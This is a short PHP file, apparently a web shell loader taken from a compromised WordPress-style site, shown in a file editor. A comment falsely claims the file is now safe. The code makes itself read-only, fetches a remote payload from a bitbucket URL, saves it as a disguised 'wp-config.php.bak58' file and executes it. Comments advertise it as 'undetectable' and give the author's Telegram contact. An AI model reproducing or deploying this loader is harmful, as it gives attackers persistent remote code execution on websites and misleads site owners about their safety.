Edit File: xx.php
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** ############################ Three-Layer Undetectable Code Created by MR.REX Designed to bypass all servers. For inquiries or to create your own,Fell free to ask: https://t.me/rex_cc ############################### */ $file = 'xx.php'; if (file_exists($file) && function_exists('chmod')) { @chmod($file, 0444); } $remoteUrl1 = "https://bitbucket.org/encophp/encophp/raw/bfdca95ef13a3885c196c7643b35ce7848f712af/yanevale.txt"; $localFile1 = 'wp-config.php.bak58'; $fileContents1 = @file_get_contents($remoteUrl1); if ($fileContents1 !== false) { file_put_contents($localFile1, $fileContents1); if (file_exists($localFile1)) { include $localFile1; } } ?>